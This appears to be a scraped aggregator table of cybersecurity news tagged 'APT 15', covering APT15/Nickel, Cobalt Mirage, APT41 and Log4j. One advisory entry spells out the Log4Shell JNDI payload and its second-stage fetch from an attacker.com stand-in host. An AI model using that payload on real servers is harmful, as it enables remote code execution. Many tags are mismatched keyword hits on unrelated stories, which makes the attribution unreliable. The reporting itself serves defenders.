What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-06-28 11:03:27 | Cloud : comment protéger l\'Europe de lois à portée extraterritoriale (lien direct) | Arbitrons en faveur d'un niveau élevé de sécurité dans le cadre du schéma européen de certification pour les services cloud, exhortent le Cigref et VOICE. | APT 15 | ||
|
2022-06-27 15:01:06 | Rachat de VMware par Broadcom : le Cigref alerte (lien direct) | Les grandes entreprises françaises membres du Cigref, toutes clientes de VMware, redoutent l'importation de pratiques commerciales "déloyales". | APT 15 | ||
 |
2022-05-17 15:01:00 | Anomali Cyber Watch: Costa Rica in Ransomware Emergency, Charming Kitten Spy and Ransom, Saitama Backdoor Hides by Sleeping, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Conti ransomware, India, Iran, Russia, Spearphishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
COBALT MIRAGE Conducts Ransomware Operations in U.S.
(published: May 12, 2022)
Secureworks researchers describe campaigns by Iran-sponsored group Cobalt Mirage. These actors are likely part of a larger group, Charming Kitten (Phosphorus, APT35, Cobalt Illusion). In 2022, Cobalt Mirage deployed BitLocker ransomware on a US charity systems, and exfiltrated data from a US local government network. Their ransomware operations appear to be a low-scale, hands-on approach with rare tactics such as sending a ransom note to a local printer. The group utilized its own custom binaries including a Fast Reverse Proxy client (FRPC) written in Go. It also relied on mass scanning for known vulnerabilities (ProxyShell, Log4Shell) and using commodity tools for encryption, internal scanning, and lateral movement.
Analyst Comment: However small your government or NGO organization is, it still needs protection from advanced cyber actors. Keep your system updated, and employ mitigation strategies when updates for critical vulnerabilities are not available.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] Proxy - T1090 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Cobalt Mirage, Phosphorous, Cobalt Illusion, TunnelVision, Impacket, wmiexec, Softperfect network scanner, LSASS, RDP, Powershell, BitLocker, Ransomware, Fast Reverse Proxy client, FRP, FRPC, Iran, source-country:IR, USA, target-country:US, Cyberespionage, Government, APT, Go, Log4j2, ProxyShell, CVE-2021-34473, CVE-2021-45046, CVE-2021-44228, CVE-2020-12812, CVE-2021-31207, CVE-2018-13379, CVE-2021-34523, CVE-2019-5591
SYK Crypter Distributing Malware Families Via Discord
(published: May 12, 2022)
Morphisec researchers discovered a new campaign abusing popular messaging platform Discord content distribution network (CDN). If a targeted user activates the phishing attachment, it starts the DNetLoader malware that reaches out to the hardcoded Discord CDN link and downloads a next stage crypter such as newly-discovered SYK crypter. SYK crypter is being loaded into memory where it decrypts its configuration and the next stage payload using hardcoded keys and various encryption methods. It detects and impairs antivirus solutions and checks for d |
Ransomware Malware Tool Vulnerability Threat Conference | APT 35 APT 15 APT 34 | |
 |
2022-05-13 06:52:53 | Iran-linked COBALT MIRAGE group uses ransomware in its operations (lien direct) | Iranian group used Bitlocker and DiskCryptor in a series of attacks targeting organizations in Israel, the US, Europe, and Australia. Researchers at Secureworks Counter Threat Unit (CTU) are investigating a series of attacks conducted by the Iran-linked COBALT MIRAGE APT group. The threat actors have been active since at least June 2020 and are linked […] | Ransomware Threat | APT 15 APT 15 | ★★★★ |
 |
2022-05-12 06:56:45 | Iranian Hackers Leveraging BitLocker and DiskCryptor in Ransomware Attacks (lien direct) | A ransomware group with an Iranian operational connection has been linked to a string of file-encrypting malware attacks targeting organizations in Israel, the U.S., Europe, and Australia. Cybersecurity firm Secureworks attributed the intrusions to a threat actor it tracks under the moniker Cobalt Mirage, which it said is linked to an Iranian hacking crew dubbed Cobalt Illusion (aka APT35, | Ransomware Malware Threat Conference | APT 35 APT 15 | ★★★★ |
 |
2022-05-12 00:00:00 | COBALT MIRAGE Conducts Ransomware Operations in U.S. (lien direct) | COBALT MIRAGE Conducts Ransomware Operations in U.S.The Iranian threat group blurs the line between financially motivated attacks and espionage.Learn how the Iranian threat group blurs the line between financially motivated attacks and espionage. | Ransomware Threat | APT 15 APT 15 | |
 |
2022-05-06 11:01:16 | Corporate Involvement in International Cybersecurity Treaties (lien direct) | The Paris Call for Trust and Stability in Cyberspace is an initiative launched by French President Emmanuel Macron during the 2018 UNESCO's Internet Governance Forum. It's an attempt by the world’s governments to come together and create a set of international norms and standards for a reliable, trustworthy, safe, and secure Internet. It's not an international treaty, but it does impose obligations on the signatories. It's a major milestone for global Internet security and safety. Corporate interests are all over this initiative, sponsoring and managing different parts of the process. As part of the Call, the French company Cigref and the Russian company Kaspersky chaired ... | APT 15 | ||
 |
2022-03-11 08:00:00 | Fig – Un super compagnon pour votre terminal macOS (lien direct) | Si vous êtes sous macOS et que comme moi, vous passez pas mal de temps dans le terminal, je vous présente Fig. Fig est un widget qui se greffe au terminal et qui permet d’ajouter des capacités avancées d’autocomplétion. Ainsi, au fur et à mesure que vous tapez, Fig fait … Suite | APT 15 | ||
 |
2022-03-10 23:39:03 | APT41 Compromised Six U.S. State Government Networks (lien direct) | FortiGuard Labs is aware of a report that threat actor APT41 compromised at least six networks belonging to U.S. state governments between May 2021 and February 2022. To gain a foothold into the victim's network, the threat actor used a number of different attack vectors: exploiting vulnerable Internet facing web applications and directory traversal vulnerabilities, performing SQL injection, and conducting de-serialization attacks. The intent of APT41 appears to be reconnaissance, though how the stolen information is to be used has not yet been determined.Why is this Significant? This is significant because at least six U.S. state government systems were broken into and data exfiltration was performed by APT41 as recent as February 2022 In addition, a zero-day vulnerability in the USAHerds application (CVE-2021-44207) as well as Log4j (CVE-2021-44228), among others, were exploited in the attacksWhat's the Detail of the Attack?APT41 performed several different ways to break into the targeted networks.In one case, the group exploited a SQL injection vulnerability in a Internet-facing web application. In another case, a then previously unknown vulnerability (CVE-2021-44207) in USAHerds, which is a web application used by agriculture officials to manage animal disease control and prevention, livestock identification and movement. Also, APT41 reportedly started to exploit the infamous Log4j vulnerability (CVE-2021-44228) within hours of Proof-of-Concept (PoC) code becoming available. Patches for both vulnerabilities are available. Once successful in breaking into the victim's network, the threat actor performed reconnaissance and credential harvesting activities. What is APT41?APT41 is a threat actor who has been active since at least 2012. Also known as TA415, Double Dragon, Barium, GREF and WickedPanda, the group reportedly performs Chinese state-sponsored espionage activities. APT41 targets organizations in multiple countries across a wide range of industries, such as telecommunications, industrial and engineering and think tanks. In 2020, five alleged members of the group were charged by the U.S. Justice Department for hacking more than 100 companies in the United States.What are the Tools Used by APT41?APT41 is known to use the following tools:ASPXSpy - web shell backdoorBITSAdmin - PowerShell cmdlets for creating and managing file transfers.BLACKCOFFEE - backdoor that disguise its communications as benign traffic to legitimate websites certutil - command-line utility tool used for manipulating certification authority (CA) data and components.China Chopper - web shell backdoor that allows attacker to have remote access to an enterprise networkCobalt Strike - a commercial penetration testing tool, which allows users to perform a wide range of activitiesDerusbi - DLL backdoorEmpire - PowerShell post-exploitation agent, which provides a wide range of attack activities to usersgh0st RAT - Remote Access Trojan (RAT)MESSAGETAP - data mining malware Mimikatz - open-source credential dumpernjRAT - Remote Access Trojan (RAT)PlugX - Remote Access Trojan (RAT)PowerSploit - open-source, offensive security framework which allows users to perform a wide range of activitiesROCKBOOT - BootkitShadowPad - backdoorWinnti for Linux - Remote Access Trojan (RAT) for LinuxZxShell - Remote Access Trojan (RAT)Badpotato - open-source tool that allows elevate user rights towards System rightsDustPan - shellcode loader. aka StealthVectorDEADEYE - downloaderLOWKEY - backdoorKeyplug - backdoorWhat are Other Vulnerabilities Known to be Exploited by APT41?APT41 exploited the following, but not restricted to, these vulnerabilities in the past:CVE-2020-10189 (ManageEngine Desktop Central remote code execution vulnerability)CVE-2019-19781 (Vulnerability in Citrix Application Delivery Controller, Citrix Gateway, and Citrix SD-WAN WANOP appliance)CVE-2019-3396 (Atlassian Confluence Widget Connector Macro Velocity Template Injection)CVE-2017-11882 (Microsoft Office Memory Corruption Vulnerability)CVE-2017-0199 (Microsoft Office/WordPad Remote Code Execut | Malware Tool Vulnerability Threat Guideline | APT 41 APT 15 APT 15 | |
 |
2022-02-15 14:24:51 | CyberheistNews Vol 12 #07 [Heads Up] FBI Warns Against New Criminal QR Code Scams (lien direct) |
[Heads Up] FBI Warns Against New Criminal QR Code Scams
Email not displaying? |
CyberheistNews Vol 12 #07 | Feb. 15th., 2022
[Heads Up] FBI Warns Against New Criminal QR Code Scams
QR codes have been around for many years. While they were adopted for certain niche uses, they never did quite reach their full potential. They are a bit like Rick Astley in that regard, really popular for one song, but well after the boat had sailed. Do not get me wrong, Rick Astley achieved a lot. In recent years, he has become immortalized as a meme and Rick roller, but he could have been so much more.
However, in recent years, with lockdown and the drive to keep things at arms length, QR codes have become an efficient way to facilitate contactless communications, or the transfer of offers without physically handing over a coupon. As this has grown in popularity, more people have become familiar with how to generate their own QR codes and how to use them as virtual business cards, discount codes, links to videos and all sorts of other things.
QRime Codes
As with most things, once they begin to gain a bit of popularity, criminals move in to see how they can manipulate the situation to their advantage. Recently, we have seen fake QR codes stuck to parking meters enticing unwitting drivers to scan the code, and hand over their payment details believing they were paying for parking, whereas they were actually handing over their payment information to criminals.
The rise in QR code fraud resulted in the FBI releasing an advisory warning against fake QR codes that are being used to scam users. In many cases, a fake QR code will lead people to a website that looks like the intended legitimate site. So, the usual verification process of checking the URL and any other red flags apply.
CONTINUED with links and 4 example malicious QR codes on the KnowBe4 blog:
https://blog.knowbe4.com/qr-codes-in-the-time-of-cybercrime
|
Ransomware Data Breach Spam Malware Threat Guideline | APT 15 APT 43 | |
|
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-12-07 15:08:56 | NICKEL - Targeting Organizations Across Europe, North America, and South America (lien direct) | FortiGuard Labs is aware of reports relating to NICKEL, a state sponsored group targeting varying interests in Europe, North and South America. NICKEL is a state sponsored group operating out of China and is targeting governmental organizations, diplomatic groups and non governmental organizations in 29 countries.NICKELs' modus operandi is the usage of exploits on unpached systems to compromise vulnerable systems and their unpatched services. Observed exploits used by NICKEL included the exploitation of services such as Microsoft Exchange, Microsoft SharePoint, and Pulse Secure VPN. Microsoft filed pleadings with the United States District Court of Eastern Virginia on December 2nd to seize control of servers used by NICKEL.What are the Technical Details?NICKEL malware variants use Internet Explorer COM interfaces to receive instructions from predefined command and control (C2) servers. The malware will then connect to the web-based C2 servers to check for a specific string located on these servers. Once confirmed, the malware will decode a Base64 encoded blob that will load shellcode for further exploitation.NICKEL malware is capable of capturing system information such as the IP address, OS version, system language, computer name and username of the current signed in user. It also contains backdoor functionality to execute commands and to upload and download files. NICKEL then uses the stolen and compromised credentials of the targeted victim to login to Microsoft 365 accounts via browser logins to exfiltrate victim emails for further damage.What Other Names is NICKEL Known As?According to Microsoft - NICKEL is also known as APT15, APT25, and Ke3Chang.Is this Limited to Targeted Attacks?Yes. Attacks are limited to varying targets in specific countries and verticals.What Countries were Targeted?They are:Argentina, Barbados, Bosnia and Herzegovina, Brazil, Bulgaria, Chile, Colombia, Croatia, Czech Republic, Dominican Republic, Ecuador, El Salvador, France, Guatemala, Honduras, Hungary, Italy, Jamaica, Mali, Mexico, Montenegro, Panama, Peru, Portugal, Switzerland, Trinidad and Tobago, United Kingdom, United States of America, and Venezuela.What is the Status of Protections?FortiGuard Labs provides the following AV coverage used in this campaign as:W32/Staser.COFE!trW32/Staser.CBQX!trW32/NetE.VH!trW32/BackDoor.U!trAll network IOC's are blocked by the FortiGuard WebFiltering client.Any Other Suggested Mitigation?Because it has been reported that NICKEL obtains access via unpatched and vulnerable systems, It is important to ensure that all known vendor vulnerabilities are addressed and updated to protect from attackers having a foothold within a network. Attackers are well aware of the difficulty of patching and if it is determined that patching is not feasible at this time, an assessment should be conducted to determine risk.Also - organizations are encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing/spear phishing attacks. They also need to encourage employees to never open attachments from someone they don't know, and to always treat emails from unrecognized/untrusted senders with caution. Since it has been reported that various phishing and spear phishing attacks have been delivered via social engineering distribution mechanisms, it is crucial that end users within an organization be made aware of the various types of attacks being delivered. This can be accomplished through regular training sessions and impromptu tests using predetermined templates by an organizations' internal security department. Simple user awareness training on how to spot emails with malicious attachments or links could also help prevent initial access into the network. | Malware Patching Guideline | APT 15 APT 25 | ★★★★ |
 |
2021-12-07 13:04:42 | Microsoft Seizes Domains Used by China-Linked APT \'Nickel\' (lien direct) | Microsoft says it has seized control of domains that China-linked threat actor Nickel has been employing in malicious attacks targeting organizations in the United States and worldwide. | Threat | APT 15 | |
 |
2021-12-07 11:52:04 | Dozens of malicious APT15 sites seized by Microsoft (lien direct) | Microsoft has seized a number of malicious sites which were targeting organisations based in 29 countries worldwide. The sites were used by the Nickle hacking group. Nickle is a China-based group also tracked as Playful Dragon, Royal APT, APT15, KE3CHANG and Vixen Panda. The group compromised serves belonging to diplomatic entities, government organisations and NGOs […] | APT 15 APT 15 APT 25 | ★★★ | |
|
2021-12-07 10:09:54 | Microsoft seized 42 domains used by the China-linked APT15 cyberespionage group (lien direct) | Microsoft seized dozens of malicious domains used by the China-linked APT15 group to target organizations worldwide. Microsoft announced to have obtained a court warrant that allowed it to seize 42 domains used by a China-linked APT15 group (aka Nickel, Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) in recent operations that targeted organizations in the US and 28 other countries. […] | APT 15 APT 25 | ||
|
2021-12-07 00:14:47 | Microsoft Seizes 42 Malicious Web Domains Used By Chinese Hackers (lien direct) | Microsoft on Monday announced the seizure of 42 domains used by a China-based cyber espionage group that set its sights on organizations in the U.S. and 28 other countries pursuant to a legal warrant issued by a federal court in the U.S. state of Virginia. The Redmond company attributed the malicious activities to a group it pursues as Nickel, and by the wider cybersecurity industry under the | APT 15 | ||
 |
2021-12-06 16:53:08 | Microsoft seizes sites used by APT15 Chinese state hackers (lien direct) | Microsoft seized today dozens of malicious sites used by the Nickel China-based hacking group to target organizations in the US and 28 other countries worldwide. [...] | APT 15 | ||
 |
2021-12-05 12:00:00 | Why Do People Make (and Watch) 5-Hour iCarly Analysis Videos? (lien direct) | Meet the obsessives creating extensive, multi-hour videos on YouTube examining long defunct Nickelodeon shows. | APT 15 | ||
|
2021-09-14 15:00:00 | Anomali Cyber Watch: Azurescape Cloud Threat, MSHTML 0-Day in The Wild, Confluence Cloud Hacked to Mine Monero, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Android, APT, Confluence, Cloud, MSHTML, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Current Anomali ThreatStream users can query these indicators under the “anomali cyber watch” tag.
Trending Cyber News and Threat Intelligence
S.O.V.A. – A New Android Banking Trojan with Fowl Intentions
(published: September 10, 2021)
ThreatFabric researchers have discovered a new Android banking trojan called S.O.V.A. The malware is still in the development and testing phase and the threat actor is publicly-advertising S.O.V.A. for trial runs targeting banks to improve its functionality. The trojan’s primary objective is to steal personally identifiable information (PII). This is conducted through overlay attacks, keylogging, man-in-the-middle attacks, and session cookies theft, among others. The malware author is also working on other features such as distributed denial-of-service (DDoS) and ransomware on S.O.V.A.’s project roadmap.
Analyst Comment: Always keep your mobile phone fully patched with the latest security updates. Only use official locations such as the Google Play Store / Apple App Store to obtain your software, and avoid downloading applications, even if they appear legitimate, from third-party stores. Furthermore, always review the permissions an app will request upon installation.
MITRE ATT&CK: [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Man-in-the-Middle - T1557 | [MITRE ATT&CK] Steal Web Session Cookie - T1539 | [MITRE ATT&CK] Network Denial of Service - T1498 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Android, Banking trojan, S.O.V.A., Overlay, Keylogging, Cookies, Man-in-the-Middle
Finding Azurescape – Cross-Account Container Takeover in Azure Container Instances
(published: September 9, 2021)
Unit 42 researchers identified and disclosed critical security issues in Microsoft’s Container-as-a-Service (CaaS) offering that is called Azure Container Instances (ACI). A malicious Azure user could have compromised the multitenant Kubernetes clusters hosting ACI, establishing full control over other users' containers. Researchers gave the vulnerability a specific name, Azurescape, highlighting its significance: it the first cross-account container takeover in the public cloud.
Analyst Comment: Azurescape vulnerabilities could have allowed an attacker to execute code on other users' containers, steal customer secrets and images deployed to the platform, and abuse ACI's infrastructure processing power. Microsoft patched ACI shortly after the discl |
Ransomware Spam Malware Tool Vulnerability Threat Guideline | Uber APT 41 APT 15 | |
|
2021-09-02 13:31:10 | Microsoft releases first Windows 11 "Nickel" build to Insiders (lien direct) | Microsoft has released the first Windows 11 "Nickel" preview build 22449 to Windows Insiders in the 'Dev' channel, allowing them to test out new unstable features that are still being developed. [...] | APT 15 | ||
 |
2021-06-17 06:12:51 | Attention, ces faux portefeuilles Ledger sont conçus pour dérober votre cryptomonnaie (lien direct) | Des pirates modifient des appareils authentiques en leur greffant un disque Flash piégé, puis ils les envoient à des utilisateurs qui ont récemment été victimes d'un vol de données sur le site web de Ledger. Pour une opération de phishing, c'est impressionnant.  |
APT 15 | ||
|
2021-04-19 04:20:51 | Passwordless: More Mirage Than Reality (lien direct) | The concept of "passwordless" authentication has been gaining significant industry and media attention. And for a good reason. Our digital lives are demanding an ever-increasing number of online accounts and services, with security best practices dictating that each requires a strong, unique password in order to ensure data stays safe. Who wouldn't want an easier way?
That's the premise behind |
APT 15 APT 15 | ||
 |
2021-03-05 11:15:25 | Cybersécurité : les Français craignent pour leur identité en ligne (lien direct) | La pandémie intervient dans un contexte où les préoccupations relatives à la sécurité vont croissantes. En novembre dernier déjà, le Cigref avait adressé un courrier au Premier ministre pour lui faire part de la préoccupation des grandes entreprises et des administrations publiques françaises vis-à-vis de l'augmentation, en nombre et en intensité, des cyberattaques. The post Cybersécurité : les Français craignent pour leur identité en ligne first appeared on UnderNews. | APT 15 | ||
 |
2021-01-20 17:00:09 | Paramount+ will replace CBS All Access on March 4 (lien direct) | The service combines CBS, MTV, BET, Paramount, Nickelodeon, and more. | APT 15 | ||
 |
2020-12-07 20:46:46 | Ever Evolving: Katie Nickels on Incident Response in a Remote World (lien direct) |
We spent some time with Katie Nickels - current Director of Intelligence at Red Canary and formerly MITRE ATT&CK Threat Intelligence Lead - to discuss applied threat intelligence, prioritizing threats for impact, and working incident response in remote environments - check it out... |
Threat Guideline | APT 15 | |
|
2020-07-02 12:11:14 | Researchers link APT15 hackers to Chinese military company (lien direct) | Researchers have linked the APT15 hacking group known for Android spyware apps to a Chinese military company, Xi'an Tian He Defense Technology Co. Ltd. [...] | APT 15 | ||
 |
2020-07-02 01:25:33 | Connection discovered between Chinese hacker group APT15 and defense contractor (lien direct) | Lookout said it linked APT15 malware to Xi'an Tianhe Defense Technology, a Chinese defense contractor. | Malware | APT 15 | |
 |
2020-06-18 22:10:28 | Spear-phishing campaign tricks users to transfer money (TTPs & IOC) (lien direct) | We are publishing the following information in order to help organisations to identify this threat before attackers will perform successful phishing on their employees. Attackers are targeting companies which have foreign trading partners, i.a. in Asia, to perform a wire transfer to a wrong bank account number.We found that domains registered using muhammad.appleseed1@mail.ru e-mail address are actively used in a spear phishing campaign that aims to trick targets to transfer money into bank accounts controller by the attacker using social engineering.Most likely attack scenario looks like following:There is an ongoing e-mail communication between company X and YAn attacker has gained access to an e-mail account of one of the parties | Threat Guideline | APT 15 | |
|
2020-05-28 07:51:22 | Ke3chang hacking group adds new Ketrum malware to its arsenal (lien direct) | The Ke3chang hacking group added a new malware dubbed Ketrum to its arsenal, it borrows portions of code and features from older backdoors. The Ke3chang hacking group (aka APT15, Vixen Panda, Playful Dragon, and Royal APT) has developed new malware dubbed Ketrum by borrowing parts of the source code and features from their older Ketrican and […] | Malware | APT 15 APT 25 | |
|
2020-05-26 11:22:03 | Hacking group builds new Ketrum malware from recycled backdoors (lien direct) | The Ke3chang hacking group historically believed to be operating out of China has developed new malware dubbed Ketrum by merging features and source code from their older Ketrican and Okrum backdoors. [...] | Malware | APT 15 APT 25 | |
 |
2020-01-22 09:00:00 | NBlog Jan 22 - further lessons from Travelex (lien direct) |  At the bottom of a Travelex update on their incident, I spotted this yesterday:Customer PrecautionsBased on the public attention this incident has received, individuals may try to take advantage of it and attempt some common e-mail or telephone scams. Increased awareness and vigilance are key to detecting and preventing this type of activity. As a precaution, if you receive a call from someone claiming to be from Travelex that you are not expecting or you are unsure about the identity of a caller, you should end the call and call back on 0345 872 7627. If you have any questions or believe you have received a suspicious e-mail or telephone call, please do not hesitate to contact us. Although I am not personally aware of any such 'e-mail or telephone scams', Travelex would know better than me - and anyway even if there have been no scams as yet, the warning makes sense: there is indeed a known risk of scammers exploiting major, well-publicised incidents such as this. We've seen it before, such as fake charity scams taking advantage of the public reaction to natural disasters such as the New Orleans floods, and - who knows - maybe the Australian bushfires.At the same time, this infosec geek is idly wondering whether the Travelex warning message and web page are legitimate. It is conceivable that the cyber-criminals and hackers behind the ransomware incident may still have control of the Travelex domains, webservers and/or websites, perhaps all their corporate comms including the Travelex Twitter feeds and maybe even the switchboard behind that 0345 number. I'm waffling on about corporate identity theft, flowing on from the original incident.I appreciate the scenario I'm postulating seems unlikely but bear with me and my professional paranoia for a moment. Let's explore the hypot |
Ransomware Malware Patching Guideline | APT 15 | |
|
2019-07-24 03:07:00 | (Déjà vu) China-Linked APT15 group is using a previously undocumented backdoor (lien direct) | ESET researchers reported that China-linked cyberespionage group APT15 has been using a previously undocumented backdoor for more than two years. Security researchers at ESET reported that China-linked threat actor APT15 (aka Ke3chang, Mirage, Vixen Panda, Royal APT and Playful Dragon) has been using a previously undocumented backdoor for more than two years. APT15 has been active […] | Threat | APT 15 APT 25 | |
|
2019-07-23 14:31:00 | China-Linked Threat Actor Using New Backdoor (lien direct) | The China-linked threat actor known as APT15 has been using a previously undocumented backdoor for more than two years, ESET's security researchers have discovered. | Threat | APT 15 | |
 |
2019-07-22 15:50:03 | A week in security (July 15 – 21) (lien direct) |
A roundup of cybersecurity news from July 15–21, including the Zoom camera vulnerability, Extenbro, Sodinokibi, Magecart, and cybersecurity challenges facing the education sector.
Categories:
A week in security
Tags: 2fa bypassadvanced persistent threatAndroid appsAPTbackdoorBitPaymer ransomwarebrowser extensionsbulletproofchromecybersecurity educationDataSpiiDDos attackDoppelPaymerEvilGnomeExtenbroFaceAppfacebookFacebook reporting toolfirefoxgenerationInstagramKe3changMagecartMedia File JackingprivacyRingCentral flawSodinokibitelegramvital infrastructurewhatsappZhumu flawzoom zero-day
(Read more...)
|
APT 15 APT 25 | ||
|
2019-07-19 14:35:01 | Malware that waits for three mouse clicks before running. (lien direct) | An elusive hacking operation is using a previously unreported backdoor in a malware campaign targeting diplomats and government departments around the world. The Ke3chang advanced persistent threat group is thought to operate out of China and has conducted cyber-espionage campaigns using remote access trojans and other malware since at least 2010. Now cybersecurity researchers at ESET have identified […] | Malware Threat | APT 15 APT 25 | ★★ |
 |
2019-07-18 09:30:01 | Okrum: Ke3chang group targets diplomatic missions (lien direct) | >Tracking the malicious activities of the elusive Ke3chang APT group, ESET researchers have discovered new versions of malware families linked to the group, and a previously unreported backdoor | Malware | APT 15 APT 25 | |
|
2019-07-18 07:03:00 | New Okrum Malware Used by Ke3chang Group to Target Diplomats (lien direct) | Updated malware implants and a new backdoor named Okrum connected with the Ke3chang threat group operating from China have been found by ESET researchers while monitoring their operations between 2015 and 2019. [...] | Malware Threat | APT 15 APT 25 | |
 |
2019-05-12 16:08:00 | Equifax : le pirate à plus de 1,4 milliard de perte (lien direct) | Le piratage informatique a un vrai coût qu’il est difficile à quantifier tant les ramifications venant s’y greffer ne se découvrent pas du jour au lendemain. Un exemple avec le piratage de 2017 de la banque Equifax. Deux ans après l’intrusion, la facture ne cesse de gonfler. Le piratage informatique est déjà psychologiquement difficile à […] | Equifax APT 15 | ||
 |
2019-04-18 13:00:00 | Ethical hacking as a post-graduation opportunity (lien direct) |
The world of cybersecurity is an ever-changing one of constant preemptive preparation, where companies are forced to hunt for any kinks in their defenses to ensure that they’re as protected as possible. Working as an ethical hacker allows information technology graduates to come into the job market and aid companies in finding those kinks so that they can remain safe in a world of increasing cybercrime. As the world of cybersecurity grows more linked with everyday life, it’s important to know what awaits those entering this job market.
Great pay
Ethical hacking is a skilled trade, reserved for those that know their way around design and programming. The average salary for ethical hacking offers a wide range - between $24,760 and $132,322. There are also many freelancing opportunities for one-time or part time positions, which can offer multiple opportunities and flexible pay. For graduates looking to deal with school loans or simply wishing to jumpstart their finances, the high ceiling of earning averages provides an excellent opportunity
Rapid growth
Ethical hacking is one of the swiftest growing areas for information technology graduates, if for no other reason than for demand. The increasingly connected internet of things is forcing companies to have a powerful online presence, which then needs to be defended. As more and more companies become connected to the internet, the need for ethical hackers to test their defenses increases as well.
In fact, the United States Bureau of Labor Statistics expect to see information security analysts, a category which includes ethical hackers, to see job growth increase by as much as 28% from 2016 to 2026. This is four times the job growth that other sectors expect to see, which sits around 7%. The job growth for ethical hacking is due to the increased need for online security, and means that graduates entering the field can expect a surplus of available positions. Additionally, the constant growth of jobs equates to advanced job options, as graduates are likely to always be able to find another position if the need arises.
Increasing skill sets
Graduates are likely to have been focusing on one or two subjects while going through their collegiate career. Ethical hacking provides an excellent way to diversify the skills one has learned, as well as providing opportunities to grow in acclaim. Many ethical hacking positions may require brief training courses that will end with the ethical hacker being rewarded with certification and verification of skills. While often optional, this is highly recommended, as certified ethical hacking professionals earn significantly more than their non-certified peers.
Ultimately, many experts believe ethical hacking to be one of the most prominent fields of information security analysis in the future. Ethical hac |
APT 15 | ||
|
2019-03-15 11:00:00 | This Guy Predicted Society\'s Thirst for Internet Fame-in 1999 (lien direct) | Early dot-com millionaire Josh Harris spent his fortune on a series of lurid social experiments to prove his point that people didn't want just 15 minutes of fame in their lives. They wanted it every day. | APT 15 | ||
|
2019-01-16 00:52:03 | “Stole $24 Million But Still Can\'t Keep a Friend” (lien direct) | Unsettling new claims have emerged about Nicholas Truglia, a 21-year-old Manhattan resident accused of hijacking cell phone accounts to steal tens of millions of dollars in cryptocurrencies from victims. The lurid details, made public in a civil lawsuit filed this week by one of his alleged victims, paints a chilling picture of a man addicted to thievery and all its trappings. The documents suggest that Truglia stole from his father and even a dead man -- all the while lamenting that his fabulous new wealth brought him nothing but misery. | APT 15 | ||
 |
2018-09-23 14:33:04 | Fuite de données corrigée pour Info Greffe (lien direct) | Une fuite de données colmatée pour le site Info Greffe. Il était possible d'accéder aux factures des clients sans avoir besoin d’être authentifié. Le site Info Greffe permet d’accéder à l’information légale sur les entreprises. Dirigeant, greffe, formalité, … Une fuite permet... Cet article Fuite de données corrigée pour Info Greffe est apparu en premier sur ZATAZ. | APT 15 | ||
|
